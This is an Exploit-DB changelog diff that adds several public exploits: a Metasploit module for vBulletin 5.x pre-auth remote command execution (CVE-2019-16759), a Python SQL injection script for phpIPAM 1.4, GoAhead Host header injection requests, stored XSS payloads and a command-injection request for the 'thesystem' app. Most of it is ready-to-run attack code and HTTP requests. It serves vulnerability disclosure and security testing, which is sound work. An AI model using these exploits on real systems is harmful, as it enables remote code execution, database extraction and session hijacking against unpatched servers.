DB: 2019-10-01

6 changes to exploits/shellcodes

GoAhead 2.5.0 - Host Header Injection
Cisco Small Business 220 Series - Multiple Vulnerabilities
vBulletin 5.x - Remote Command Execution (Metasploit)
phpIPAM 1.4 - SQL Injection
thesystem 1.0 - Cross-Site Scripting
TheSystem 1.0 - Command Injection

exploits/multiple/remote/47439.txt

@@ -0,0 +1,99 @@
+# Exploit Title: GoAhead Web server HTTP Header Injection.
+# Shodan Query: Server: Goahead
+# Discovered Date: 05/07/2019
+# Exploit Author: Ramikan
+# Vendor Homepage: https://www.embedthis.com/goahead/
+# Affected Version: 2.5.0 may be others.
+# Tested On Version: 2.5.0 in Cisco Switches and Net Gear routers.
+# Vendor Fix: N/A
+# CVE : N/A
+# CVSS v3: N/A
+# Category: Hardware, Web Apps
+# Reference : www.fact-in-hack.blogspot.com
+
+Vulnerability: Host Header Injection
+
+A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
+
+An issue was discovered in GoAhead web server version 2.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
+
+PS: Affected on most of embedded webservers on hardware such as switches, routers, IOT and IP cameras. 
+
+
+POC: 1
+
+Request:
+
+POST /goform/login HTTP/1.1
+Host: myevilwebsite.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+Connection: close
+Referer: https://46725846267.com/login.asp
+Upgrade-Insecure-Requests: 1
+
+username=admin&password=admin&language=english
+
+
+Response:
+
+
+HTTP/1.0 302 Redirect
+Server: Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN
+Date: Fri Jul 12 15:28:29 2019
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+
+<html><head></head><body>
+		This document has moved to a new <a href="https://myevilwebsite.com/login.asp">location</a>.
+		Please update your documents to reflect the new location.
+		</body></html>
+
+POC: 2
+
+Request:
+
+POST /config/log_off_page.htm HTTP/1.1
+Host: google.com:443
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: 12344
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 774
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+restoreUrl=&errorCollector=&ModuleTable=OK&rlPhdModuleTable%24VT=OK&rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleNumberOfPorts%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&ModuleTable%24endVT=OK&rlPhdModuleStackUnit%24repeat%3F1=1&rlPhdModuleIndex%24repeat%3F1=1&rlPhdModuleType%24repeat%3F1=47&rlPhdModuleNumberOfPorts%24repeat%3F1=28&ModuleTable%24endRepeat%3F1=OK&userName%24query=%24enab15%24&password%24query=admin&x=0&y=0
+
+Response:
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Sat Oct 14 19:04:59 2006
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com:443/config/accessnotallowedpage.htm
+
+<html><head></head><body>
+                        This document has moved to a new <a href="http://google.com:443/config/accessnotallowedpage.htm">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+
+POC: 3 
+
+curl -k --header "Host: attacker domain" "victim's url"
+
+
+Initial Investigation:
+
+Potentially affected Part of the source code in GoAhead web server is in the ’http.c’ file, which contains 'host' parameter.
+https://github.com/embedthis/goahead/blob/master/src/http.c

exploits/php/webapps/47437.rb

@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+ super(update_info(info,
+                   'Name'           => 'vBulletin 5.x 0day pre-quth RCE exploit',
+      'Description'    => %q{
+        vBulletin 5.x 0day pre-auth RCE exploit.
+        This should work on all versions from 5.0.0 till 5.5.4
+      },
+      'Platform'       => 'php',
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Reported by: anonymous',  # reported by
+          'Original exploit by: anonymous',  # original exploit
+          'Metasploit mod by: r00tpgp',  # metasploit module
+      ],
+      'Payload'        =>
+        {
+          'BadChars'    => "\x22",
+        },
+      'References'     =>
+        [
+          ['CVE', 'CVE-2019-16759'],
+          ['EDB', 'NA'],
+          ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+      #    ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
+      #    ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
+      ],
+      'DisclosureDate' => 'Sep 23 2019',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+        ])
+
+  end
+
+    def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
+      'encode_params' => false,
+      'vars_post'     => 
+      {
+        'widgetConfig[code]'  => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;",
+      }
+     })
+
+     if res && res.body && res.body.include?('h4x0000r4l1f4')
+       return Exploit::CheckCode::Vulnerable
+     end
+
+     Exploit::CheckCode::Safe
+  end
+
+    def exploit
+      print_status("Sending payload.....")
+      resp = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),
+      'encode_params' => false,
+      'vars_post'     =>
+      {
+        #'widgetConfig[code]'  => "echo " + payload.encoded + "exit;",
+	 'widgetConfig[code]'  => payload.encoded,
+      }
+     })
+      #unless resp and resp.code == 200
+      # fail_with(Failure::Unknown, "Exploit failed.")
+      #end
+
+      #print_good("Success!")
+      #print_line(resp.body)
+
+   end
+end

exploits/php/webapps/47438.txt

@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# Exploit Title: phpIPAM Custom Field Filter SQL Injection
+# Exploit Announcement Date: September 16, 2019 5:18 AM
+# Exploit Creation Date: September 27, 2019
+# Exploit Author: Kevin Kirsche
+# Vendor Homepage: https://phpipam.net
+# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
+# Version: 1.4
+# Tested on: Ubuntu 18.04 / MariaDB 10.4
+# Requires:
+#   Python 3
+#   requests package
+# CVE: CVE-2019-16692
+
+# For more details, view:
+# https://github.com/phpipam/phpipam/issues/2738
+# https://github.com/kkirsche/CVE-2019-16692
+
+# Example Output
+# [+] Executing select user()
+# [*] Received: phpipam@172.18.0.4
+# [+] Executing select system_user()
+# [*] Received: phpipam@172.18.0.4
+# [+] Executing select @@version
+# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
+# [+] Executing select @@datadir
+# [*] Received: /var/lib/mysq
+# [+] Executing select @@hostname
+# [*] Received: ubuntu
+
+
+from requests import Session
+
+host = "localhost"
+login_url = f"http://{host}/app/login/login_check.php"
+exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"
+
+credentials = {
+    "ipamusername": "Admin",
+    "ipampassword": "Password",
+}
+
+payload = {
+    "action": "add",
+    "table": "",
+}
+
+
+cmds = {
+    "unpriv": [
+        "select user()",
+        "select system_user()",
+        "select @@version",
+        "select @@datadir",
+        "select @@hostname",
+    ]
+}
+
+if __name__ == "__main__":
+    client = Session()
+    resp = client.post(login_url, data=credentials)
+    if resp.status_code == 200:
+        for cmd in cmds["unpriv"]:
+            print(f"[+] Executing {cmd}")
+            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
+            resp = client.post(exploit_url, data=payload)
+            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
+            print(f"[*] Received: {info}")

exploits/python/webapps/47440.txt

@@ -0,0 +1,74 @@
+# Exploit Title: thesystem Persistent XSS 
+# Author: Anıl Baran Yelken 
+# Discovery Date: 2019-09-28 
+# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
+# Software Link: https://github.com/kostasmitroglou/thesystem 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+# Type: Webapps 
+# Description: 
+# Persistent XSS after login bypass(login_required didn't used) 
+
+First of all, I send a request add_server 
+POST /add_server/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------3902153292 
+Content-Length: 1205 
+Connection: close 
+Referer: http://127.0.0.1:8000/add_server/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 
+Upgrade-Insecure-Requests: 1 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+S5HLlkGrTnGH2FHIP4ry58Mw8Rw9KiPF3j6wIQ5tQvzMLmZTLAayAVs4Htg6OCRn 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="operating_system" 
+<script>alert("kale1")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="ip_address" 
+127.0.0.1 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_port" 
+22 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_owner" 
+<script>alert("kale2")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_username" 
+<script>alert("kale3")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_password" 
+<script>alert("kale4")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="system_description" 
+<script>alert("kale5")</script> 
+-----------------------------3902153292 
+Content-Disposition: form-data; name="server_name" 
+<script>alert("kale6")</script> 
+-----------------------------3902153292-- 
+
+After I send a request show_server_data 
+GET /show_server_data/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Connection: close 
+Referer: http://127.0.0.1:8000/data/ 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977 
+Upgrade-Insecure-Requests: 1 
+
+And I showed persistent XSS: 
+HTTP/1.1 200 OK 
+Date: Sat, 28 Sep 2019 09:51:04 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Length: 437 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')(25, '<script>alert("kale1")</script>', '127.0.0.1', '22', '<script>alert("kale2")</script>', '<script>alert("kale3")</script>', '<script>alert("kale4")</script>', '<script>alert("kale5")</script>', '<script>alert("kale6")</script>', '2019-09-28')

exploits/python/webapps/47441.txt

@@ -0,0 +1,52 @@
+# Exploit Title: thesystem Command Injection 
+# Author: Sadik Cetin 
+# Discovery Date: 2019-09-28 
+# Vendor Homepage: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] 
+# Software Link: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] 
+# Tested Version: 1.0 
+# Tested on OS: Windows 10 
+# CVE: N/A 
+# Type: Webapps 
+# Description: 
+# Simple Command injection after login bypass(login_required didn't used) 
+
+POST /run_command/ HTTP/1.1 
+Host: 127.0.0.1:8000 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
+Accept-Encoding: gzip, deflate 
+Content-Type: multipart/form-data; boundary=---------------------------168279961491 
+Content-Length: 325 
+Connection: close 
+Referer: [ http://127.0.0.1:8000/run_command/ | http://127.0.0.1:8000/run_command/ ] 
+Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 
+Upgrade-Insecure-Requests: 1 
+-----------------------------168279961491 
+Content-Disposition: form-data; name="csrfmiddlewaretoken" 
+7rigJnIFAByKlmo6NBD7R8Ua66daVjdfiFH16T7HxJrP43GhJ7m7mVAIFIX7ZDfX 
+-----------------------------168279961491 
+Content-Disposition: form-data; name="command" 
+ping 127.0.0.1 
+-----------------------------168279961491-- 
+
+HTTP/1.1 200 OK 
+Date: Sat, 28 Sep 2019 09:42:26 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Length: 429 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+
+Pinging 127.0.0.1 with 32 bytes of data: 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Ping statistics for 127.0.0.1: 
+Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
+Approximate round trip times in milli-seconds: 
+Minimum = 0ms, Maximum = 0ms, Average = 0ms 
+
+When I try to run following command, all commands run: 
+dir 
+whoami

files_exploits.csv

@@ -17684,6 +17684,8 @@ id,file,description,date,author,type,platform,port
 47412,exploits/windows/remote/47412.py,"File Sharing Wizard 1.5.0 - POST SEH Overflow",2019-09-24,x00pwn,remote,windows,80
 47416,exploits/windows/remote/47416.rb,"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)",2019-09-24,Metasploit,remote,windows,3389
 47429,exploits/windows/remote/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",remote,windows,
+47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,
+47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41774,3 +41776,7 @@ id,file,description,date,author,type,platform,port
 47434,exploits/hardware/webapps/47434.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery",2019-09-27,LiquidWorm,webapps,hardware,
 47435,exploits/hardware/webapps/47435.txt,"V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation",2019-09-27,LiquidWorm,webapps,hardware,
 47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,
+47437,exploits/php/webapps/47437.rb,"vBulletin 5.x - Remote Command Execution (Metasploit)",2019-09-30,r00tpgp,webapps,php,
+47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80
+47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
+47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,